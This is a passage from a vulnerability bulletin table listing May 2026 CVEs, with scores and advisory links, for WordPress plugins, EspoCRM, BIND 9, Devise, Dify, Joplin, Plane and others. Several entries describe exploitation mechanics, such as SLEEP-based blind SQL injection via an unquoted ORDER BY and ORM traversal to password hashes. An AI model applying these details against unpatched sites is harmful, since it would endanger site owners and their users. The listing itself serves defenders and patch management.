| edmonparker–Read More & Accordion | The Read More & Accordion plugin for WordPress is vulnerable to time-based blind SQL Injection via the ‘orderby’ parameter in all versions up to, and including, 3.5.7. This is due to the use of esc_sql() without surrounding the value in quotes in an ORDER BY clause inside the getAllDataByLimit() and getAccordionAllDataByLimit() functions in ReadMoreData.php. The user-supplied $_GET[‘orderby’] value is only processed through esc_attr() (an HTML-escaping function) before being passed to these database functions, where esc_sql() is applied but the value is directly concatenated-unquoted-into the ORDER BY fragment of the SQL query before $wpdb->prepare() is called. Because esc_sql() only escapes quote characters and backslashes (which are irrelevant in an unquoted ORDER BY context), an attacker can inject arbitrary SQL expressions such as (SELECT SLEEP(5)) or conditional subqueries to perform time-based blind data extraction. This makes it possible for authenticated attackers with administrator-level access or above (or any role explicitly permitted access to the plugin’s admin pages via the yrm-user-roles setting) to extract sensitive data from the database, including administrator credential hashes. | 2026-05-20 | 4.9 | CVE-2026-7472 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cc7c7e21-fbd7-4451-bc7d-3d11db01a443?source=cve https://plugins.trac.wordpress.org/browser/expand-maker/trunk/classes/ReadMoreData.php#L1522 https://plugins.trac.wordpress.org/browser/expand-maker/tags/3.5.7/classes/ReadMoreData.php#L1522 https://plugins.trac.wordpress.org/browser/expand-maker/trunk/views/readMorePagesView.php#L29 https://plugins.trac.wordpress.org/browser/expand-maker/tags/3.5.7/views/readMorePagesView.php#L29 https://plugins.trac.wordpress.org/browser/expand-maker/trunk/classes/ReadMoreData.php#L1537 https://plugins.trac.wordpress.org/browser/expand-maker/tags/3.5.7/classes/ReadMoreData.php#L1537 https://plugins.trac.wordpress.org/browser/expand-maker/trunk/views/accordionBuilder/list.php#L29 https://plugins.trac.wordpress.org/browser/expand-maker/tags/3.5.7/views/accordionBuilder/list.php#L29 |
| espocrm–espocrm | EspoCRM is an open source customer relationship management application. Versions 9.3.3 and below allow authenticated users to upload SVG attachments through normal attachment-capable fields and later serve those SVG files as top-level inline documents through both the attachment and image entry points, resulting in stored cross-user XSS reachable through a normal attachment workflow. Although inline SVG script is blocked by the response CSP, the same CSP still allows same-origin external script. As a result, an attacker can upload a malicious SVG together with a second attacker-controlled JavaScript attachment, then trick another user into opening the SVG to execute JavaScript in the victim’s EspoCRM origin. This issue has been fixed in version 9.3.4. | 2026-05-19 | 6.8 | CVE-2026-33741 | https://github.com/espocrm/espocrm/security/advisories/GHSA-5wh5-ccv2-m3pv |
| Esri–ArcGIS Server | ArcGIS Server contains an improper authentication vulnerability in an undocumented administrative endpoint. An unauthenticated attacker could exploit this issue by sending a crafted request to the endpoint. Successful exploitation may result in disruption of the web-based browsing interface. This issue affects ArcGIS Server 12.0 and earlier. | 2026-05-20 | 5.3 | CVE-2026-2812 | https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/april2026_security_bulletin |
| Esri–ArcGIS Server | ArcGIS Server contains an input validation weakness in the login redirection workflow. An Authenticated attacker could exploit this issue by sending a specially crafted request, Successful exploitation may result in the application redirecting the browser to an unintended, untrusted site, resulting in a limited confidentiality impact under specific user interaction conditions. The vulnerability affects only the client side navigation logic during authentication and remains confined to the same security boundary. No server side compromise or cross component impact is possible. This issue affects ArcGIS Server 11.5. | 2026-05-20 | 4.7 | CVE-2026-2813 | https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/april2026_security_bulletin |
| etspring–LJ comments import: reloaded | The LJ comments import: reloaded plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via PHP_SELF Parameter in all versions up to, and including, 0.97.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. The vulnerability arises specifically because PHP_SELF includes attacker-controllable PATH_INFO appended to the script name, and there are two distinct unsanitized echo points for this value in the same function. | 2026-05-20 | 6.1 | CVE-2026-8624 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0f09cb59-dbbb-48a3-aeac-377f6ec87b88?source=cve https://plugins.trac.wordpress.org/browser/lj-comments-import-reloaded/trunk/lj_comments_import.php#L129 https://plugins.trac.wordpress.org/browser/lj-comments-import-reloaded/trunk/lj_comments_import.php#L161 |
| goback2–Logo Manager For Enamad | The Logo Manager For Enamad plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘title’ attribute of the `vc_enamad_namad`, `vc_enamad_shamed`, and `vc_enamad_custom` shortcodes in all versions up to, and including, 0.7.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-20 | 6.4 | CVE-2026-6549 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ed6d1167-c89d-4c97-9446-b968df945e6c?source=cve https://wordpress.org/plugins/logo-manager-for-enamad https://plugins.trac.wordpress.org/browser/logo-manager-for-enamad/tags/0.7.4/widgets.php#L295 https://plugins.trac.wordpress.org/browser/logo-manager-for-enamad/trunk/widgets.php#L295 |
| HCL–BigFix Service Management (SM) | HCL BigFix Service Management (SM) is susceptible to a Configuration – ‘Insecure Use of Base Image Version’. Using outdated or insecure base images may introduce known vulnerabilities, potentially increasing the risk of exploitation in the application environment. | 2026-05-20 | 4 | CVE-2025-31973 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| HCLSoftware–Connections | HCL Connections contains a broken access control vulnerability that may allow unauthorized user to update data in certain scenarios. | 2026-05-18 | 4.6 | CVE-2026-21789 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129719 |
| HCLSoftware–DominoIQ | The HCL DominoIQ RAG feature is affected by a Broken Access Control vulnerability. Under certain circumstances, document level access restrictions will be ignored when determining what data to return from an AI query. This could enable an authenticated attacker to view sensitive data. | 2026-05-20 | 6.5 | CVE-2026-21836 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130932 |
| heartcombo–devise | Devise is an authentication solution for Rails based on Warden. In versions 5.0.3 and below, when the Timeoutable module is enabled in Devise, the FailureApp#redirect_url method returns request.referrer – the HTTP Referer header, which is attacker-controllable – without validation for any non-GET request that results in a session timeout. An attacker who hosts a page with an auto-submitting cross-origin form can cause a victim with an expired Devise session to be redirected to an arbitrary external URL. This contrasts with the GET timeout path (which uses server-side attempted_path) and Devise’s own store_location_for mechanism (which strips external hosts via extract_path_from_location), both of which are protected; only the non-GET timeout redirect path is unprotected. Expired-session users can be silently redirected from the trusted app domain to attacker-controlled URLs, enabling phishing and malware delivery while bypassing browser warnings. Note: Rails’ built-in open-redirect protection does not mitigate this issue. Devise::FailureApp is an ActionController::Metal app with its own isolated copy of the relevant redirect configuration, so config.action_controller.action_on_open_redirect = :raise (and the older raise_on_open_redirects setting) do not reach it. This issue has been fixed in version 5.0.4. | 2026-05-22 | 6.1 | CVE-2026-40295 | https://github.com/heartcombo/devise/security/advisories/GHSA-jp94-3292-c3xv https://github.com/heartcombo/devise/commit/025fe2124f9928766fc46520e999633b598d0360 |
| helgatheviking–KIA Subtitle | The KIA Subtitle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s `the-subtitle` shortcode `before` and `after` attributes in all versions up to, and including, 4.0.1. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-22 | 6.4 | CVE-2026-7509 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a9a52097-0d85-4036-9b74-f35fea549607?source=cve https://plugins.trac.wordpress.org/browser/kia-subtitle/tags/4.0.1/kia-subtitle.php#L359 https://plugins.trac.wordpress.org/browser/kia-subtitle/tags/4.0.1/kia-subtitle.php#L329 https://plugins.trac.wordpress.org/browser/kia-subtitle/trunk/kia-subtitle.php#L359 https://plugins.trac.wordpress.org/browser/kia-subtitle/trunk/kia-subtitle.php#L329 https://plugins.trac.wordpress.org/browser/kia-subtitle/tags/4.0.2/kia-subtitle.php#L369 https://plugins.trac.wordpress.org/browser/kia-subtitle/tags/4.0.2/kia-subtitle.php#L370 |
| helpstring–Child Height Predictor by Ostheimer | The Child Height Predictor by Ostheimer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to and including 1.3. This is due to missing nonce verification in the options() function, which handles plugin settings updates. The form template does not include a wp_nonce_field() call, and the handler never calls check_admin_referer() or wp_verify_nonce(). This makes it possible for unauthenticated attackers to trick a site administrator into clicking a link or visiting a malicious page that submits a forged POST request, causing unauthorized changes to the plugin settings such as unit preferences to be persisted to the database via update_option(). | 2026-05-20 | 4.3 | CVE-2026-6400 | https://www.wordfence.com/threat-intel/vulnerabilities/id/dc1681a8-5f2e-45f1-96d9-797b13644607?source=cve https://plugins.trac.wordpress.org/browser/child-height-predictor/trunk/childheight.php#L149 https://plugins.trac.wordpress.org/browser/child-height-predictor/tags/1.3/childheight.php#L149 https://plugins.trac.wordpress.org/browser/child-height-predictor/trunk/childheight.php#L135 https://plugins.trac.wordpress.org/browser/child-height-predictor/tags/1.3/childheight.php#L135 |
| Honeywell International Inc.–Control Network Module (CNM) | Honeywell Control Network Module (CNM) contains insertion of sensitive information into an unintended directory. An attacker could exploit this vulnerability through probing system files, potentially resulting in unintended access to protected data. | 2026-05-21 | 5.9 | CVE-2026-5434 | https://process.honeywell.com/ |
| infility–Infility Global | The Infility Global plugin for WordPress is vulnerable to SQL Injection via the ‘orderby’ and ‘order’ parameters in all versions up to, and including, 2.15.16. This is due to insufficient escaping on user supplied parameters and lack of sufficient preparation on the existing SQL query within the show_control_data::post_list() function, which is registered as an admin menu page with only the ‘read’ capability. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-20 | 6.5 | CVE-2026-8685 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1caeb5e0-9e4e-4c9e-a6e4-881fb81dc5f2?source=cve https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L34 https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L74 https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L78 https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L84 |
| Intelbras — VIP-1230-D-G4 | An issue in Intelbras VIP-1230-D-G4 Version V2.800.00IB00C.0.T allows a remote attacker to obtain sensitive information via password reset functionality under /OutsideCmd | 2026-05-18 | 5.3 | CVE-2026-36438 | https://backend.intelbras.com/sites/default/files/2023-03/Datasheet%20UNIFICADO%20-%20VIP%201230%20B.D.G4-v2.pdf https://www.intelbras.com/pt-br/camera-dome-wi-fi-vip-1230-d-w-g4 https://github.com/kensh1k/CVE-2026-36438/tree/main |
| ISC–BIND 9 | BIND resolvers are vulnerable to an amplified resource consumption/exhaustion attack. If a victim resolver makes a query to a specially crafted zone, the resolver will consume disproportionate resources. This issue affects BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.48, 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1. | 2026-05-20 | 5.3 | CVE-2026-3592 | CVE-2026-3592 https://downloads.isc.org/isc/bind9/9.18.49 https://downloads.isc.org/isc/bind9/9.20.23 https://downloads.isc.org/isc/bind9/9.21.22 |
| ISC–BIND 9 | An unbounded resend loop vulnerability exists in the BIND 9 resolver state machine during bad-server handling, enabling a remote unauthenticated attacker to cause severe resource exhaustion by sending queries that trigger specific retry conditions. This issue affects BIND 9 versions 9.18.36 through 9.18.48, 9.20.8 through 9.20.22, 9.21.7 through 9.21.21, 9.18.36-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1. | 2026-05-20 | 5.3 | CVE-2026-5950 | CVE-2026-5950 https://downloads.isc.org/isc/bind9/9.18.49 https://downloads.isc.org/isc/bind9/9.20.23 https://downloads.isc.org/isc/bind9/9.21.22 |
| ItzCrazyKns–Vane | A security vulnerability has been detected in ItzCrazyKns Vane up to 1.12.1. Affected by this issue is some unknown functionality of the file route.ts of the component API. The manipulation leads to missing authentication. The attack may be initiated remotely. The attack’s complexity is rated as high. The exploitation is known to be difficult. The exploit has been disclosed publicly and may be used. It appears that basic authentication is planned. | 2026-05-24 | 5.6 | CVE-2026-9371 | VDB-365334 | ItzCrazyKns Vane API route.ts missing authentication VDB-365334 | CTI Indicators (IOB, IOC, IOA) Submit #813209 | ItzCrazyKns Vane 1.12.1 API Key Exposure Submit #813210 | ItzCrazyKns Vane 1.12.1 Missing Authentication for Critical Function (Duplicate) https://github.com/ItzCrazyKns/Vane/issues/1122 https://github.com/ItzCrazyKns/Vane/issues/1123 https://github.com/ItzCrazyKns/Vane/ |
| jarrodwatts–claude-hud | Claude HUD through 0.0.12, patched in commit 234d9aa, constructs OSC 8 terminal hyperlink escape sequences using raw cwd and branchUrl values without stripping control characters or encoding embedded values, allowing attackers to inject arbitrary ANSI codes into terminal sessions. Attackers can embed ESC+backslash sequences in the current working directory or branch URL to execute malicious ANSI codes including text color changes, forged prompts, and OSC 52 clipboard writes, or trigger outbound HTTP requests to attacker-controlled remotes when hyperlinks are clicked. | 2026-05-18 | 4.6 | CVE-2026-47090 | https://github.com/jarrodwatts/claude-hud/issues/485 https://github.com/jarrodwatts/claude-hud/pull/487 https://github.com/jarrodwatts/claude-hud/commit/234d9aad919b51326a43bcf90b45ae35c23afc30 https://www.vulncheck.com/advisories/claude-hud-terminal-injection-via-osc-8-hyperlinks |
| javibola–JaviBola Custom Theme Test | The JaviBola Custom Theme Test plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.5. This is due to missing or incorrect nonce validation on the options page. This makes it possible for unauthenticated attackers to change the site’s active theme by modifying the jbct_theme option via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-20 | 4.3 | CVE-2026-8423 | https://www.wordfence.com/threat-intel/vulnerabilities/id/68a8a277-2ea6-4d75-b8cd-4d20eb17b3aa?source=cve https://plugins.trac.wordpress.org/browser/javibola-custom-theme/trunk/javibola-custom-theme.php#L41 https://plugins.trac.wordpress.org/browser/javibola-custom-theme/tags/2.0.5/javibola-custom-theme.php#L41 https://plugins.trac.wordpress.org/browser/javibola-custom-theme/trunk/javibola-custom-theme.php#L40 https://plugins.trac.wordpress.org/browser/javibola-custom-theme/tags/2.0.5/javibola-custom-theme.php#L40 https://plugins.trac.wordpress.org/browser/javibola-custom-theme/trunk/javibola-custom-theme.php#L54 https://plugins.trac.wordpress.org/browser/javibola-custom-theme/tags/2.0.5/javibola-custom-theme.php#L54 |
| jay_patel–Remove Yellow BGBOX | The Remove Yellow BGBOX plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the ‘rybb_api_settings’ page. This makes it possible for unauthenticated attackers to reset the plugin’s stored settings by overwriting its configuration via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-20 | 4.3 | CVE-2026-8424 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c5b30d27-a3f8-4535-a47f-675c939ec648?source=cve https://plugins.trac.wordpress.org/browser/remove-yellow-bgbox/trunk/admin/rybb_api_settings.php#L5 https://plugins.trac.wordpress.org/browser/remove-yellow-bgbox/tags/1.0/admin/rybb_api_settings.php#L5 https://plugins.trac.wordpress.org/browser/remove-yellow-bgbox/trunk/includes/functions.php#L16 https://plugins.trac.wordpress.org/browser/remove-yellow-bgbox/tags/1.0/includes/functions.php#L16 |
| jetmonsters–MotoPress Hotel Booking | The MotoPress Hotel Booking plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 6.0.1. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to overwrite or delete the internal notes (_mphb_booking_internal_notes) of any booking by supplying an arbitrary booking ID. The nonce for this action is output in the HTML source of every public page through wp_localize_script (MPHB._data.nonces), so any unauthenticated visitor can obtain a valid nonce and perform the action without any account or prior interaction. | 2026-05-22 | 5.3 | CVE-2026-8684 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6567e63c-3129-47b2-a734-733eb599821a?source=cve https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/tags/6.0.1/includes/ajax-api/ajax-actions/update-booking-notes.php#L83 https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/tags/6.0.1/includes/ajax-api/ajax-actions/abstract-ajax-api-action.php#L34 https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/tags/6.0.1/includes/ajax-api/ajax-api-handler.php#L43 https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/tags/5.4.1/includes/ajax-api/ajax-actions/update-booking-notes.php#L83 https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/tags/5.4.1/includes/ajax-api/ajax-actions/abstract-ajax-api-action.php#L34 https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/tags/5.4.1/includes/ajax-api/ajax-api-handler.php#L43 https://plugins.trac.wordpress.org/changeset/3537354/motopress-hotel-booking-lite/trunk/includes/ajax-api/ajax-actions/update-booking-notes.php |
| Jomres–Jomres | Joomla Component jomres 9.11.2 contains a cross-site request forgery vulnerability that allows attackers to modify user account information by tricking authenticated users into visiting malicious pages. Attackers can craft HTML forms targeting the account/index endpoint with hidden fields to change passwords, email addresses, and profile details without user consent. | 2026-05-23 | 4.3 | CVE-2018-25354 | ExploitDB-44901 Official Product Homepage Product Reference VulnCheck Advisory: Joomla Component jomres 9.11.2 Cross-Site Request Forgery |
| jupyterhub–jupyterhub | JupyterHub is software that allows users to create a multi-user server for Jupyter notebooks. In versions 4.1.0 through 5.4.4, XSRF protection (updated in 4.1.0) inappropriately treated requests with Sec-Fetch-Mode: no-cors as same-origin requests, bypassing XSRF checks. The JSON API is not affected, only HTTP form endpoints, such as /hub/spawn and /hub/accept-share, meaning attackers could trigger server spawn (but not access the server) and if the attacker is a JupyterHub user permitted to share access to their server, cause a user to accept a share and have access to the attacker’s server. This issue has been fixed in version 5.4.5. If developers are unable to immediately upgrade, they can temporarily mitigate this issue by dropping requests to JupyterHub with Sec-Fetch-Mode: no-cors if they are using a reverse proxy. | 2026-05-22 | 5.4 | CVE-2026-40864 | https://github.com/jupyterhub/jupyterhub/security/advisories/GHSA-m68r-v472-jgq9 https://github.com/jupyterhub/jupyterhub/commit/9c5ec277d3cda5a59de2d8c8117efa77bd941127 |
| kasparsd–Widget Context | The Widget Context plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.3. This is due to missing or incorrect nonce validation on the save_widget_context_settings function. This makes it possible for unauthenticated attackers to modify widget visibility context settings stored in the WordPress options table via a forged POST request to /wp-admin/widgets.php via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-22 | 4.3 | CVE-2026-7615 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3c434637-4bf9-46ee-9a6d-35eab7ef11a1?source=cve https://plugins.trac.wordpress.org/browser/widget-context/trunk/src/WidgetContext.php#L311 https://plugins.trac.wordpress.org/browser/widget-context/tags/1.3.3/src/WidgetContext.php#L311 https://plugins.trac.wordpress.org/browser/widget-context/trunk/src/WidgetContext.php#L282 https://plugins.trac.wordpress.org/browser/widget-context/tags/1.3.3/src/WidgetContext.php#L282 https://plugins.trac.wordpress.org/browser/widget-context/trunk/src/WidgetContext.php#L91 https://plugins.trac.wordpress.org/browser/widget-context/tags/1.3.3/src/WidgetContext.php#L91 https://github.com/kasparsd/widget-context-wporg/pull/73 |
| Kieback & Peter–DDC4002 | The affected Kieback & Peter DDC building controllers are vulnerable to cross-site scripting, enabling JavaScript to be executed by the victim’s browser, which allows the attacker to control the browser. | 2026-05-20 | 5.3 | CVE-2026-4293 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-139-05 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-139-05.json |
| ktulhu–Bigfishgames Syndicate | The Bigfishgames Syndicate plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2. This is due to missing or incorrect nonce validation on the bigfishgames_syndicate_submenu() function. This makes it possible for unauthenticated attackers to reset plugin settings and update them via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-20 | 4.3 | CVE-2026-6452 | https://www.wordfence.com/threat-intel/vulnerabilities/id/67877a2e-a45d-4674-b749-05d9217ef6bf?source=cve https://plugins.trac.wordpress.org/browser/bigfishgames-syndicate/trunk/bigfishgames-syndicate.php#L238 https://plugins.trac.wordpress.org/browser/bigfishgames-syndicate/tags/1.2/bigfishgames-syndicate.php#L238 https://plugins.trac.wordpress.org/browser/bigfishgames-syndicate/trunk/bigfishgames-syndicate.php#L169 https://plugins.trac.wordpress.org/browser/bigfishgames-syndicate/tags/1.2/bigfishgames-syndicate.php#L169 |
| langgenius–dify | Dify version 1.14.1 and prior contain an authorization bypass vulnerability in the file preview endpoint that allows any authenticated user to read up to 3,000 characters of any uploaded document across all tenants and workspaces using only the file’s UUID. Attackers can access the /console/api/files/{file_id}/preview endpoint with an intercepted file UUID to extract sensitive content from documents without ownership or workspace permission verification. NOTE: Dify Cloud allows unauthenticated free self-registration, making account creation trivially accessible to any attacker. | 2026-05-18 | 5.9 | CVE-2026-41949 | https://huntr.com/bounties/d50a0240-7951-4939-b989-9bded66c7682 https://github.com/langgenius/dify/pull/35797 https://www.vulncheck.com/advisories/dify-authorization-bypass-via-file-preview-endpoint |
| laurent22–joplin | Joplin is an open source note-taking and to-do application that organises notes and lists into notebooks. Versions 3.6.14 and prior contain a Denial of Service (DoS) vulnerability in the title input functionality due to a lack of proper length validation. This flaw allows an attacker to cause an Out Of Memory (OOM) error and subsequent program termination by inserting an excessively long string into a note’s title. This can be triggered either through direct user interface (UI) input or programmatically via the local web service API after compromising an authentication token. There are 2 primary methods of exploitation: via User Interface (UI) Input, and the Local Web Service API. A local user can directly type or paste an extremely long string into the title field when creating or editing a note Joplin runs a local web service (typically on port 41184) that allows programmatic interaction, such as creating or editing notes via HTTP API calls. If an attacker manages to exfiltrate or compromise the user’s authentication token (e.g., through malware on the local system, or other local vulnerabilities), they can then send a crafted HTTP POST request to this local API. By including an excessively long string in the title parameter of this request, the application will attempt to allocate an unbounded amount of memory. This issue has been patched in version 3.7.1. | 2026-05-19 | 5.5 | CVE-2025-57798 | https://github.com/laurent22/joplin/security/advisories/GHSA-6jm8-gr87-q69x https://github.com/laurent22/joplin/commit/5b8795da446a5a40c9e212c98b35e368ffce628e |
| laurent22–joplin | Joplin is an open source note-taking and to-do application that organises notes and lists into notebooks. Versions 3.5.2 and prior contain a logic error in the delta API that allows share recipients to download notes that are no longer shared with them, related to but not fully fixed by the prior patch in #14289. In ChangeModel.delta, when DELTA_INCLUDES_ITEMS is enabled (the default), the latest state of items is attached to delta output without verifying that those items are still shared with the requesting user, and the existing removal logic only filters items deleted for all users. Additionally, the change compression logic incorrectly reduces create – delete to NOOP, which is unsafe because compression is applied per page and an item can have multiple create events; if an earlier create falls on a separate page from a later create -> delete pair, the deletion is dropped and the sequence collapses to a create. As a result, the delta API returns a create event for a deleted item with the full latest content attached, exposing notes the user no longer has access to. This issue has been fixed in version 3.5.3. | 2026-05-19 | 5.7 | CVE-2026-34600 | https://github.com/laurent22/joplin/security/advisories/GHSA-88×4-77rc-jw94 https://github.com/laurent22/joplin/issues/14110 https://github.com/laurent22/joplin/pull/14289 |
| Ledger–Ledger Bitcoin app | Ledger Bitcoin app versions 2.1.0 and 2.1.1 contain an address derivation vulnerability that allows attackers to cause incorrect Bitcoin addresses to be displayed by exploiting improper handling of miniscript policies containing the a: fragment. Attackers can craft malicious miniscript policies that cause the device to derive and display incorrect receiving addresses, potentially leading to funds being sent to unintended addresses. | 2026-05-20 | 4 | CVE-2023-7346 | Ledger Security Bulletin 019 https://www.vulncheck.com/advisories/ledger-bitcoin-app-address-derivation-error-via-miniscript |
| Ledger–Ledger Nano X | Ledger Nano X, Flex, and Stax devices contain a denial of service vulnerability in the MCU firmware update process due to missing validation of the reset_handler parameter during firmware flashing. An attacker can provide a crafted reset_handler address pointing to invalid memory or attacker-controlled code to cause the device to enter an unrecoverable fault state during boot, resulting in permanent loss of operability. | 2026-05-19 | 4.6 | CVE-2025-15645 | Ledger Security Bulletin 021 https://www.vulncheck.com/advisories/ledger-nano-x-flex-stax-mcu-firmware-update-denial-of-service |
| Ledger–ledgerhq/hw-app-eth | Ledger Live with vulnerable versions of ledgerhq/hw-app-eth prior to 6.34.7 contains an integer parsing vulnerability that allows attackers to manipulate EIP-712 typed data messages by exploiting incorrect hexadecimal field parsing when values contain an odd number of characters. Attackers can obtain signatures on truncated or misinterpreted message values to authorize unintended blockchain transactions, such as asset transfers at incorrect amounts. | 2026-05-19 | 6.5 | CVE-2023-7345 | Ledger Security Bulletin 020 https://www.vulncheck.com/advisories/ledger-live-hw-app-eth-eip-712-message-parsing-integer-truncation |
| linlinjava–litemall | A security vulnerability has been detected in linlinjava litemall up to 1.8.0. Affected by this vulnerability is the function backup/load of the file litemall-db/src/main/java/org/linlinjava/litemall/db/util/DbUtil.java of the component Database Setting Handler. The manipulation of the argument db/password leads to argument injection. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-18 | 4.7 | CVE-2026-8773 | VDB-364398 | linlinjava litemall Database Setting DbUtil.java load argument injection VDB-364398 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811469 | linlinjava litemall up to 1.8.0 Argument Injection https://gist.github.com/A1AAAAAAAAAA1/d5ae30a17744459e7cc5902fff32a35b |
| Live Networks, Inc.–LIVE555 | LIVE555 before 2026.04.22 contains an authorization bypass vulnerability in RTSP session command handling that allows attackers to replay valid Session tokens from unauthenticated connections. Attackers who obtain a valid Session token can issue PLAY and TEARDOWN commands from a second TCP connection without authentication, causing server crashes through virtual function call errors or disrupting active streams by terminating victim sessions. | 2026-05-19 | 5.9 | CVE-2026-41470 | https://gist.github.com/yhcho0405/ee9b67a96808ef19f22e8a4ee88c795f https://download.live555.com/ https://www.vulncheck.com/advisories/live555-rtsp-server-authorization-bypass-via-session-token |
| lykich–Correct Prices | The Correct Prices plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the $_SERVER[‘PHP_SELF’] variable in versions up to and including 1.0. This is due to the correct_prices_page() function echoing $_SERVER[‘PHP_SELF’] into a form’s action attribute without any input sanitization or output escaping (such as esc_url() or esc_attr()). Because PHP_SELF reflects attacker-controlled path-info appended to the script URL, an attacker can break out of the attribute and inject arbitrary markup. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a specially crafted link. | 2026-05-20 | 6.1 | CVE-2026-8627 | https://www.wordfence.com/threat-intel/vulnerabilities/id/605c6c53-6920-42ba-8784-b3a186bbf821?source=cve https://plugins.trac.wordpress.org/browser/correct-prices/trunk/correct_prices.php#L134 |
| Magepeople inc.–WpBookingly | Missing Authorization vulnerability in Magepeople inc. WpBookingly allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WpBookingly: from n/a through 1.2.9. | 2026-05-20 | 6.5 | CVE-2026-27405 | https://patchstack.com/database/wordpress/plugin/service-booking-manager/vulnerability/wordpress-wpbookingly-plugin-1-2-9-broken-access-control-vulnerability?_s_id=cve |
| makeplane–plane | Plane is an open-source project management tool. In versions 1.3.0 and below, SavedAnalyticEndpoint passes the user-controlled segment query parameter directly to a Django F() expression without validation (unlike the regular AnalyticsEndpoint, which checks against an allowlist), causing ORM Field Reference Injection. An authenticated workspace MEMBER can send GET /api/workspaces/<slug>/saved-analytic-view/<analytic_id>/ with a crafted segment value that is forwarded into build_graph_plot() and traverses foreign-key relationships (e.g. workspace__owner__password) before being projected via .values(“dimension”, “segment”), returning the referenced field values directly in the JSON response. This exposes sensitive data such as bcrypt password hashes, API tokens, and related users’ email addresses, making it a stronger primitive than the related order_by injection where values are only leaked through ordering. This issue has been fixed in version 1.3.1. | 2026-05-20 | 6.5 | CVE-2026-40102 | https://github.com/makeplane/plane/security/advisories/GHSA-93×3-ghh7-72j3 https://github.com/makeplane/plane/releases/tag/v1.3.1 |
| manchumahara–CBX 5 Star Rating & Review | The CBX 5 Star Rating & Review plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘page’ parameter in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link. | 2026-05-22 | 6.1 | CVE-2026-6864 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9ee11e19-21a6-45df-a118-f6dec3b55bc1?source=cve https://plugins.trac.wordpress.org/browser/cbxscratingreview/tags/1.0.7/templates/admin/admin-rating-review-rating-avg-logs.php#L41 https://plugins.trac.wordpress.org/browser/cbxscratingreview/tags/1.0.7/templates/admin/admin-rating-review-review-logs.php#L41 https://plugins.trac.wordpress.org/browser/cbxscratingreview/tags/1.0.8/templates/admin/admin-rating-review-review-logs.php https://plugins.trac.wordpress.org/browser/cbxscratingreview/tags/1.0.8/templates/admin/admin-rating-review-rating-avg-logs.php |
